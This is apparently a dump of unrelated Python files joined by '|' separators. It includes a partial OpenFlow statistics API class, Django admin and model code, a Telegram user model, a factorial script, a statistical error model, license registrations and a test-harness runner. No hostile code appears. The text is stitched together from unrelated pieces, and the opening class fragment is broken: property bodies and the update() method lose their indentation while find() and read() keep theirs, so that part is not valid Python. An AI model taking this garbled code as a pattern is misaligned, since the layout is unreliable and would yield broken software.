return self._get_attribute(self._SDM_ATT_MAP["SetConfigTx"])
@SetConfigTx.setter
def SetConfigTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["SetConfigTx"], value)
@property
def StatRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Stat Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["StatRepliesRx"])
@StatRepliesRx.setter
def StatRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["StatRepliesRx"], value)
@property
def StatRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Stat Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["StatRequestsTx"])
@StatRequestsTx.setter
def StatRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["StatRequestsTx"], value)
@property
def SwitchConfigErrorsRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Switch Config Errors Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["SwitchConfigErrorsRx"])
@SwitchConfigErrorsRx.setter
def SwitchConfigErrorsRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["SwitchConfigErrorsRx"], value)
@property
def TableFeatureErrorsRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Table Feature Errors Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["TableFeatureErrorsRx"])
@TableFeatureErrorsRx.setter
def TableFeatureErrorsRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["TableFeatureErrorsRx"], value)
@property
def TableFeatureRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Table Feature Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["TableFeatureRepliesRx"])
@TableFeatureRepliesRx.setter
def TableFeatureRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["TableFeatureRepliesRx"], value)
@property
def TableFeatureRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Table Feature Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["TableFeatureRequestsTx"])
@TableFeatureRequestsTx.setter
def TableFeatureRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["TableFeatureRequestsTx"], value)
@property
def TableModErrorsRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Table Mod Errors Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["TableModErrorsRx"])
@TableModErrorsRx.setter
def TableModErrorsRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["TableModErrorsRx"], value)
@property
def TableModsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Table Mods Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["TableModsTx"])
@TableModsTx.setter
def TableModsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["TableModsTx"], value)
@property
def TableStatRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Table Stat Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["TableStatRepliesRx"])
@TableStatRepliesRx.setter
def TableStatRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["TableStatRepliesRx"], value)
@property
def TableStatRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Table Stat Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["TableStatRequestsTx"])
@TableStatRequestsTx.setter
def TableStatRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["TableStatRequestsTx"], value)
@property
def VendorMessagesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Vendor Messages Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["VendorMessagesRx"])
@VendorMessagesRx.setter
def VendorMessagesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["VendorMessagesRx"], value)
@property
def VendorMessagesTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Vendor Messages Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["VendorMessagesTx"])
@VendorMessagesTx.setter
def VendorMessagesTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["VendorMessagesTx"], value)
@property
def VendorStatRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Vendor Stat Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["VendorStatRepliesRx"])
@VendorStatRepliesRx.setter
def VendorStatRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["VendorStatRepliesRx"], value)
@property
def VendorStatRequestsTx(self):
    # type: () -> bool
    """
    Returns
    -------
    - bool: Vendor Stat Requests Tx
    """
    attr_key = self._SDM_ATT_MAP["VendorStatRequestsTx"]
    return self._get_attribute(attr_key)
@VendorStatRequestsTx.setter
def VendorStatRequestsTx(self, value):
    # type: (bool) -> None
    """Sets the bool 'VendorStatRequestsTx' attribute."""
    attr_key = self._SDM_ATT_MAP["VendorStatRequestsTx"]
    self._set_attribute(attr_key, value)
def update(
    self,
    ActionErrorsRx=None,
    AuxiliaryConnectionsUp=None,
    BarrierRepliesRx=None,
    BarrierRequestsTx=None,
    DescriptionStatRepliesRx=None,
    DescriptionStatRequestsTx=None,
    EchoRepliesRx=None,
    EchoRepliesTx=None,
    EchoRequestsRx=None,
    EchoRequestsTx=None,
    ErrorsRx=None,
    ExperimenterErrorsRx=None,
    FeatureRepliesRx=None,
    FeatureRequestsTx=None,
    FlowAddsTx=None,
    FlowAggregateStatRepliesRx=None,
    FlowAggregateStatRequestsTx=None,
    FlowDelsTx=None,
    FlowModErrorsRx=None,
    FlowModsTx=None,
    FlowRateflowssec=None,
    FlowRemovesRx=None,
    FlowStatRepliesRx=None,
    FlowStatRequestsTx=None,
    GetAsynchronousConfigRepliesRx=None,
    GetAsynchronousConfigRequestsTx=None,
    GetConfigRepliesRx=None,
    GetConfigRequestsTx=None,
    GetQueueConfigRepliesRx=None,
    GetQueueConfigRequestsTx=None,
    GroupAddsTx=None,
    GroupDelsTx=None,
    GroupDescRepliesRx=None,
    GroupDescRequestsTx=None,
    GroupFeatureRepliesRx=None,
    GroupFeatureRequestsTx=None,
    GroupModErrorsRx=None,
    GroupModsTx=None,
    GroupStatRepliesRx=None,
    GroupStatRequestsTx=None,
    HelloErrorsRx=None,
    HellosRx=None,
    HellosTx=None,
    InstructionErrorsRx=None,
    MatchErrorsRx=None,
    MeterAddsTx=None,
    MeterConfigRepliesRx=None,
    MeterConfigRequestsTx=None,
    MeterDelsTx=None,
    MeterFeatureRepliesRx=None,
    MeterFeatureRequestsTx=None,
    MeterModErrorsRx=None,
    MeterModsTx=None,
    MeterStatRepliesRx=None,
    MeterStatRequestsTx=None,
    OfChannelConfigured=None,
    OfChannelConfiguredUp=None,
    OfChannelFlapCount=None,
    OfChannelLearnedUp=None,
    PacketInsRx=None,
    PacketOutsTx=None,
    PacketinReasonAction=None,
    PacketinReasonInvalidTTL=None,
    PacketinReasonNoMatch=None,
    PortDescRepliesRx=None,
    PortDescRequestsTx=None,
    PortModErrorsRx=None,
    PortModsTx=None,
    PortName=None,
    PortStatRepliesRx=None,
    PortStatRequestsTx=None,
    PortStatusesRx=None,
    QueueOpErrorsRx=None,
    QueueStatRepliesRx=None,
    QueueStatRequestsTx=None,
    RequestErrorsRx=None,
    RoleRepliesRx=None,
    RoleRequestErrorsRx=None,
    RoleRequestsTx=None,
    SetAsynchronousConfigTx=None,
    SetConfigTx=None,
    StatRepliesRx=None,
    StatRequestsTx=None,
    SwitchConfigErrorsRx=None,
    TableFeatureErrorsRx=None,
    TableFeatureRepliesRx=None,
    TableFeatureRequestsTx=None,
    TableModErrorsRx=None,
    TableModsTx=None,
    TableStatRepliesRx=None,
    TableStatRequestsTx=None,
    VendorMessagesRx=None,
    VendorMessagesTx=None,
    VendorStatRepliesRx=None,
    VendorStatRequestsTx=None,
):
    # type: (...) -> OpenflowAggregatedStatistics
    """Updates the openflowAggregatedStatistics resource on the server.

    Every argument is a bool named after the statistic it controls (the
    human-readable label matches the name, e.g. FlowModsTx -> 'Flow Mods
    Tx'); see the property of the same name on this class for details.

    Raises
    ------
    - ServerError: The server has encountered an uncategorized error condition
    """
    # locals() is captured inside the call expression, before any new
    # local is bound, so it contains exactly the arguments above + self.
    attribute_values = self._map_locals(self._SDM_ATT_MAP, locals())
    return self._update(attribute_values)
    def find(
        self,
        ActionErrorsRx=None,
        AuxiliaryConnectionsUp=None,
        BarrierRepliesRx=None,
        BarrierRequestsTx=None,
        DescriptionStatRepliesRx=None,
        DescriptionStatRequestsTx=None,
        EchoRepliesRx=None,
        EchoRepliesTx=None,
        EchoRequestsRx=None,
        EchoRequestsTx=None,
        ErrorsRx=None,
        ExperimenterErrorsRx=None,
        FeatureRepliesRx=None,
        FeatureRequestsTx=None,
        FlowAddsTx=None,
        FlowAggregateStatRepliesRx=None,
        FlowAggregateStatRequestsTx=None,
        FlowDelsTx=None,
        FlowModErrorsRx=None,
        FlowModsTx=None,
        FlowRateflowssec=None,
        FlowRemovesRx=None,
        FlowStatRepliesRx=None,
        FlowStatRequestsTx=None,
        GetAsynchronousConfigRepliesRx=None,
        GetAsynchronousConfigRequestsTx=None,
        GetConfigRepliesRx=None,
        GetConfigRequestsTx=None,
        GetQueueConfigRepliesRx=None,
        GetQueueConfigRequestsTx=None,
        GroupAddsTx=None,
        GroupDelsTx=None,
        GroupDescRepliesRx=None,
        GroupDescRequestsTx=None,
        GroupFeatureRepliesRx=None,
        GroupFeatureRequestsTx=None,
        GroupModErrorsRx=None,
        GroupModsTx=None,
        GroupStatRepliesRx=None,
        GroupStatRequestsTx=None,
        HelloErrorsRx=None,
        HellosRx=None,
        HellosTx=None,
        InstructionErrorsRx=None,
        MatchErrorsRx=None,
        MeterAddsTx=None,
        MeterConfigRepliesRx=None,
        MeterConfigRequestsTx=None,
        MeterDelsTx=None,
        MeterFeatureRepliesRx=None,
        MeterFeatureRequestsTx=None,
        MeterModErrorsRx=None,
        MeterModsTx=None,
        MeterStatRepliesRx=None,
        MeterStatRequestsTx=None,
        OfChannelConfigured=None,
        OfChannelConfiguredUp=None,
        OfChannelFlapCount=None,
        OfChannelLearnedUp=None,
        PacketInsRx=None,
        PacketOutsTx=None,
        PacketinReasonAction=None,
        PacketinReasonInvalidTTL=None,
        PacketinReasonNoMatch=None,
        PortDescRepliesRx=None,
        PortDescRequestsTx=None,
        PortModErrorsRx=None,
        PortModsTx=None,
        PortName=None,
        PortStatRepliesRx=None,
        PortStatRequestsTx=None,
        PortStatusesRx=None,
        QueueOpErrorsRx=None,
        QueueStatRepliesRx=None,
        QueueStatRequestsTx=None,
        RequestErrorsRx=None,
        RoleRepliesRx=None,
        RoleRequestErrorsRx=None,
        RoleRequestsTx=None,
        SetAsynchronousConfigTx=None,
        SetConfigTx=None,
        StatRepliesRx=None,
        StatRequestsTx=None,
        SwitchConfigErrorsRx=None,
        TableFeatureErrorsRx=None,
        TableFeatureRepliesRx=None,
        TableFeatureRequestsTx=None,
        TableModErrorsRx=None,
        TableModsTx=None,
        TableStatRepliesRx=None,
        TableStatRequestsTx=None,
        VendorMessagesRx=None,
        VendorMessagesTx=None,
        VendorStatRepliesRx=None,
        VendorStatRequestsTx=None,
    ):
        # type: (bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool) -> OpenflowAggregatedStatistics
        """Finds and retrieves openflowAggregatedStatistics resources from the server.
        All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve openflowAggregatedStatistics resources from the server.
        To retrieve an exact match ensure the parameter value starts with ^ and ends with $
        By default the find method takes no parameters and will retrieve all openflowAggregatedStatistics resources from the server.
        Args
        ----
        - ActionErrorsRx (bool): Action Errors Rx
        - AuxiliaryConnectionsUp (bool): Auxiliary Connections Up
        - BarrierRepliesRx (bool): Barrier Replies Rx
        - BarrierRequestsTx (bool): Barrier Requests Tx
        - DescriptionStatRepliesRx (bool): Description Stat Replies Rx
        - DescriptionStatRequestsTx (bool): Description Stat Requests Tx
        - EchoRepliesRx (bool): Echo Replies Rx
        - EchoRepliesTx (bool): Echo Replies Tx
        - EchoRequestsRx (bool): Echo Requests Rx
        - EchoRequestsTx (bool): Echo Requests Tx
        - ErrorsRx (bool): Errors Rx
        - ExperimenterErrorsRx (bool): Experimenter Errors Rx
        - FeatureRepliesRx (bool): Feature Replies Rx
        - FeatureRequestsTx (bool): Feature Requests Tx
        - FlowAddsTx (bool): Flow Adds Tx
        - FlowAggregateStatRepliesRx (bool): Flow Aggregate Stat Replies Rx
        - FlowAggregateStatRequestsTx (bool): Flow Aggregate Stat Requests Tx
        - FlowDelsTx (bool): Flow Dels Tx
        - FlowModErrorsRx (bool): Flow Mod Errors Rx
        - FlowModsTx (bool): Flow Mods Tx
        - FlowRateflowssec (bool): Flow Rate (flows/sec)
        - FlowRemovesRx (bool): Flow Removes Rx
        - FlowStatRepliesRx (bool): Flow Stat Replies Rx
        - FlowStatRequestsTx (bool): Flow Stat Requests Tx
        - GetAsynchronousConfigRepliesRx (bool): Get Asynchronous Config Replies Rx
        - GetAsynchronousConfigRequestsTx (bool): Get Asynchronous Config Requests Tx
        - GetConfigRepliesRx (bool): Get Config Replies Rx
        - GetConfigRequestsTx (bool): Get Config Requests Tx
        - GetQueueConfigRepliesRx (bool): Get Queue Config Replies Rx
        - GetQueueConfigRequestsTx (bool): Get Queue Config Requests Tx
        - GroupAddsTx (bool): Group Adds Tx
        - GroupDelsTx (bool): Group Dels Tx
        - GroupDescRepliesRx (bool): Group Desc Replies Rx
        - GroupDescRequestsTx (bool): Group Desc Requests Tx
        - GroupFeatureRepliesRx (bool): Group Feature Replies Rx
        - GroupFeatureRequestsTx (bool): Group Feature Requests Tx
        - GroupModErrorsRx (bool): Group Mod Errors Rx
        - GroupModsTx (bool): Group Mods Tx
        - GroupStatRepliesRx (bool): Group Stat Replies Rx
        - GroupStatRequestsTx (bool): Group Stat Requests Tx
        - HelloErrorsRx (bool): Hello Errors Rx
        - HellosRx (bool): Hellos Rx
        - HellosTx (bool): Hellos Tx
        - InstructionErrorsRx (bool): Instruction Errors Rx
        - MatchErrorsRx (bool): Match Errors Rx
        - MeterAddsTx (bool): Meter Adds Tx
        - MeterConfigRepliesRx (bool): Meter Config Replies Rx
        - MeterConfigRequestsTx (bool): Meter Config Requests Tx
        - MeterDelsTx (bool): Meter Dels Tx
        - MeterFeatureRepliesRx (bool): Meter Feature Replies Rx
        - MeterFeatureRequestsTx (bool): Meter Feature Requests Tx
        - MeterModErrorsRx (bool): Meter Mod Errors Rx
        - MeterModsTx (bool): Meter Mods Tx
        - MeterStatRepliesRx (bool): Meter Stat Replies Rx
        - MeterStatRequestsTx (bool): Meter Stat Requests Tx
        - OfChannelConfigured (bool): OF Channel Configured
        - OfChannelConfiguredUp (bool): OF Channel Configured Up
        - OfChannelFlapCount (bool): OF Channel Flap Count
        - OfChannelLearnedUp (bool): OF Channel Learned Up
        - PacketInsRx (bool): Packet Ins Rx
        - PacketOutsTx (bool): Packet Outs Tx
        - PacketinReasonAction (bool): PacketIn Reason Action
        - PacketinReasonInvalidTTL (bool): PacketIn Reason Invalid TTL
        - PacketinReasonNoMatch (bool): PacketIn Reason No Match
        - PortDescRepliesRx (bool): Port Desc Replies Rx
        - PortDescRequestsTx (bool): Port Desc Requests Tx
        - PortModErrorsRx (bool): Port Mod Errors Rx
        - PortModsTx (bool): Port Mods Tx
        - PortName (bool): Port Name
        - PortStatRepliesRx (bool): Port Stat Replies Rx
        - PortStatRequestsTx (bool): Port Stat Requests Tx
        - PortStatusesRx (bool): Port Statuses Rx
        - QueueOpErrorsRx (bool): Queue Op Errors Rx
        - QueueStatRepliesRx (bool): Queue Stat Replies Rx
        - QueueStatRequestsTx (bool): Queue Stat Requests Tx
        - RequestErrorsRx (bool): Request Errors Rx
        - RoleRepliesRx (bool): Role Replies Rx
        - RoleRequestErrorsRx (bool): Role Request Errors Rx
        - RoleRequestsTx (bool): Role Requests Tx
        - SetAsynchronousConfigTx (bool): Set Asynchronous Config Tx
        - SetConfigTx (bool): Set Config Tx
        - StatRepliesRx (bool): Stat Replies Rx
        - StatRequestsTx (bool): Stat Requests Tx
        - SwitchConfigErrorsRx (bool): Switch Config Errors Rx
        - TableFeatureErrorsRx (bool): Table Feature Errors Rx
        - TableFeatureRepliesRx (bool): Table Feature Replies Rx
        - TableFeatureRequestsTx (bool): Table Feature Requests Tx
        - TableModErrorsRx (bool): Table Mod Errors Rx
        - TableModsTx (bool): Table Mods Tx
        - TableStatRepliesRx (bool): Table Stat Replies Rx
        - TableStatRequestsTx (bool): Table Stat Requests Tx
        - VendorMessagesRx (bool): Vendor Messages Rx
        - VendorMessagesTx (bool): Vendor Messages Tx
        - VendorStatRepliesRx (bool): Vendor Stat Replies Rx
        - VendorStatRequestsTx (bool): Vendor Stat Requests Tx
        Returns
        -------
        - self: This instance with matching openflowAggregatedStatistics resources retrieved from the server available through an iterator or index
        Raises
        ------
        - ServerError: The server has encountered an uncategorized error condition
        """
        # locals() captures every keyword above; _map_locals translates the
        # Python attribute names to REST attribute names via _SDM_ATT_MAP and
        # drops the ones left at None before the server-side regex match.
        return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
    def read(self, href):
        # type: (str) -> OpenflowAggregatedStatistics
        """Retrieves a single instance of openflowAggregatedStatistics data from the server.
        Args
        ----
        - href (str): An href to the instance to be retrieved
        Returns
        -------
        - self: This instance with the openflowAggregatedStatistics resources from the server available through an iterator or index
        Raises
        ------
        - NotFoundError: The requested resource does not exist on the server
        - ServerError: The server has encountered an uncategorized error condition
        """
        # Direct fetch by href; unlike find(), no regex filtering is applied.
        return self._read(href)
|
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from .forms import CustomUserChangeForm, CustomUserCreationForm
from .models import CustomUser, UsersCount
class CustomUserAdmin(UserAdmin):
    """Admin for CustomUser: stock UserAdmin plus the extra profile fields."""
    add_form = CustomUserCreationForm  # form used on the "add user" page
    form = CustomUserChangeForm        # form used on the "change user" page
    model = CustomUser
    list_display = ['username', 'first_name', 'last_name']
    # Append our custom fields as an extra (untitled) section after the
    # sections inherited from UserAdmin.
    fieldsets = UserAdmin.fieldsets + (
        (None, {'fields': ('phonenumber', 'address', 'social_network')}),
    )
@admin.register(UsersCount)
class UsersCountAdmin(admin.ModelAdmin):
    """Admin whose changelist also reports the number of non-staff users."""

    change_list_template = 'admin/users_count_change_list.html'

    def changelist_view(self, request, extra_context=None):
        """Inject ``amount`` (count of non-staff users) into the changelist context.

        Returns the standard changelist response unchanged when it has no
        context (e.g. a redirect after a filter/search error).
        """
        response = super().changelist_view(
            request,
            extra_context=extra_context,
        )
        try:
            users = response.context_data['cl'].queryset.filter(is_staff=False)
        except (AttributeError, KeyError):
            # Redirect responses have no context_data; nothing to annotate.
            return response
        # count() issues a single COUNT(*) query instead of materializing
        # every row in Python as len(queryset) would.
        response.context_data['amount'] = users.count()
        return response


admin.site.register(CustomUser, CustomUserAdmin)
|
from datetime import timedelta
from django.db import models
from django.utils import timezone
class TelegramUser(models.Model):
    """
    Telegram user
    """
    # Telegram user IDs exceed 32 bits, hence BigIntegerField as primary key.
    id = models.BigIntegerField(primary_key=True, unique=True)
    username = models.CharField(max_length=120, blank=True)   # @handle, optional
    first_name = models.CharField(max_length=120)
    last_name = models.CharField(max_length=120, blank=True)
    is_bot = models.BooleanField(default=False)
    # True when the record was created by hand rather than from the Telegram API.
    is_manually_added = models.BooleanField(default=False)
    # Number of times this user interacted with the bot — presumably
    # incremented by the handler code; confirm against the caller.
    access_count = models.IntegerField(default=0)
    created_at = models.DateTimeField(auto_now_add=True)
    updated_at = models.DateTimeField(auto_now=True)

    class Meta:
        # Most recently active users first.
        ordering = ('-updated_at', )

    def __str__(self):
        return self.first_name
|
def factorial(n):
    """Return n! (the product 1 * 2 * ... * n).

    Iterative rather than recursive, so large n cannot hit Python's
    recursion limit, and negative input fails fast instead of recursing
    forever as the original recursive version did.

    Args:
        n: a non-negative integer.

    Returns:
        int: n factorial; 1 when n is 0 or 1.

    Raises:
        ValueError: if n is negative.
    """
    if n < 0:
        raise ValueError("factorial is undefined for negative numbers")
    result = 1
    for factor in range(2, n + 1):
        result *= factor
    return result
# Script entry: read a number and print its factorial.
n = int(input("enter number"))
# Fixed user-facing typo: "facorial" -> "factorial".
print("factorial number of {0} is {1} ".format(n, factorial(n)))
|
from scipy import stats
from spux.distributions.tensor import Tensor
from units import units
from auxiliary import auxiliary
from spux.distributions.merge import Merge
# define an error model
class Error(object):
    """Observation error model: Gaussian noise on the 'position' variable."""

    def __init__(self, scalar=True):
        # scalar=True: prediction is a flat mapping with a 'position' entry;
        # scalar=False: prediction nests it under prediction['values'].
        self.scalar = scalar

    # auxiliary dataset loader (optional)
    def auxiliary(self, time):
        return auxiliary(time)

    def distribution(self, prediction, parameters):
        """Return the error distribution for *prediction* given *parameters*.

        Each observed variable gets an independent scipy.stats distribution;
        see https://docs.scipy.org/doc/scipy/reference/stats.html for the
        available univariate options.
        """
        if self.scalar:
            position = prediction['position']
        else:
            position = prediction['values']['position']
        marginals = {'position': stats.norm(position, parameters['error'])}

        # Tensorize the independent marginals into one joint distribution.
        joint = Tensor(marginals)
        joint.setup(units=units['observations'])

        if self.scalar:
            return joint
        distribution_auxiliary = None  # construct your auxiliary distribution here
        return Merge(joint, distribution_auxiliary)


error = Error()
|
from __future__ import unicode_literals
from django.utils.translation import ugettext_lazy as _
from common import MayanAppConfig
from common.classes import Package
class AppearanceApp(MayanAppConfig):
    """App config for the appearance package; registers the license text of
    every bundled front-end asset so it can be shown in the about/licenses UI."""
    name = 'appearance'
    verbose_name = _('Appearance')

    def ready(self):
        super(AppearanceApp, self).ready()
        # Each Package() call records a third-party asset and its license
        # verbatim; the text below is legal notice and must not be edited.
        Package(label='Bootstrap', license_text='''
The MIT License (MIT)
Copyright (c) 2011-2015 Twitter, Inc
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
''')
        Package(label='Animate.css', license_text='''
Animate.css is licensed under the MIT license. (http://opensource.org/licenses/MIT)
''')
        Package(label='Bootswatch', license_text='''
The MIT License (MIT)
Copyright (c) 2013 Thomas Park
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
''')
        Package(label='fancyBox', license_text='''
fancyBox licensed under Creative Commons Attribution-NonCommercial 3.0 license.
''')
        Package(label='jquery_lazyload', license_text='''
All code licensed under the MIT License. All images licensed under Creative Commons Attribution 3.0 Unported License. In other words you are basically free to do whatever you want. Just don't remove my name from the source.
''')
        Package(label='ScrollView', license_text='''
Copyright (c) 2009 Toshimitsu Takahashi
Released under the MIT license.
''')
        Package(label='Font Awesome', license_text='''
Font License
Applies to all desktop and webfont files in the following directory: font-awesome/fonts/.
License: SIL OFL 1.1
URL: http://scripts.sil.org/OFL
Code License
Applies to all CSS and LESS files in the following directories: font-awesome/css/, font-awesome/less/, and font-awesome/scss/.
License: MIT License
URL: http://opensource.org/licenses/mit-license.html
''')
        Package(label='jQuery', license_text='''
Copyright jQuery Foundation and other contributors, https://jquery.org/
This software consists of voluntary contributions made by many
individuals. For exact contribution history, see the revision history
available at https://github.com/jquery/jquery
The following license applies to all parts of this software except as
documented below:
====
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
====
All files located in the node_modules and external directories are
externally maintained libraries used by this software which have their
own licenses; we recommend you read them, as their terms may differ from
the terms above.
''')
        Package(label='django-widget-tweaks', license_text='''
Copyright (c) 2011-2015 Mikhail Korobov
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
''')
|
#!/usr/bin/env python
"""Run the testing harness for one problem and clean up its temp files."""
import os, sys

# Make the shared `testing` module (two directories up) importable.
current_dir = os.getcwd()
test_suite_path = os.path.dirname(os.path.dirname(current_dir))
sys.path.append(test_suite_path)

import testing

problem_number = testing.parse_argv()
current_dir = os.getcwd() + '/'
exec_path = current_dir + str(problem_number) + '.py'
testing.check_executable(exec_path)
solutions_directory = current_dir + 'senior/S' + str(problem_number) + '/'
solution_file_paths = testing.get_solution_file_paths(solutions_directory)
temp_infile_path = current_dir + 's' + str(problem_number) + '.in'
temp_outfile_path = current_dir + 'progOutput.txt'
try:
    testing.test_program(exec_path, solution_file_paths, temp_infile_path, temp_outfile_path)
finally:
    # Remove temp files without shelling out (the original built an
    # `os.system('rm -f ...')` command string); like `rm -f`, missing
    # files are silently ignored.
    for path in (temp_infile_path, temp_outfile_path):
        try:
            os.remove(path)
        except OSError:
            pass
from apps.core.models.model_base import ModelBase
from django.db import models
class Participation(ModelBase):
    """A user's participation in a mission, with its lifecycle status."""

    class Status(models.TextChoices):
        READY = 'ready'
        PARTICIPATED = 'participated'
        SUCCESS = 'success'
        FAILURE = 'failure'

    mission = models.ForeignKey("Mission", related_name="participated_mission", on_delete=models.CASCADE,
                                db_column="mission")
    owner = models.ForeignKey("user.User", related_name="participated_user", on_delete=models.CASCADE,
                              db_column="owner")
    status = models.CharField('status', max_length=15, choices=Status.choices, default=Status.READY)
    start_date = models.DateTimeField(auto_now_add=True)
    end_date = models.DateTimeField()
    # Set by the periodic job once this row has been inspected — TODO confirm.
    is_cron_checked = models.BooleanField(default=False)

    def save(self, *args, **kwargs):
        """Persist, then refresh the parent mission's counters.

        NOTE(review): the else-branch treats every non-SUCCESS status
        (including FAILURE) as "in progress" — confirm this is intended
        rather than an overlooked FAILURE case.
        """
        super().save(*args, **kwargs)
        if self.status == Participation.Status.SUCCESS:
            self.mission.update_successful_count()
        else:
            self.mission.update_in_progress_count()
|
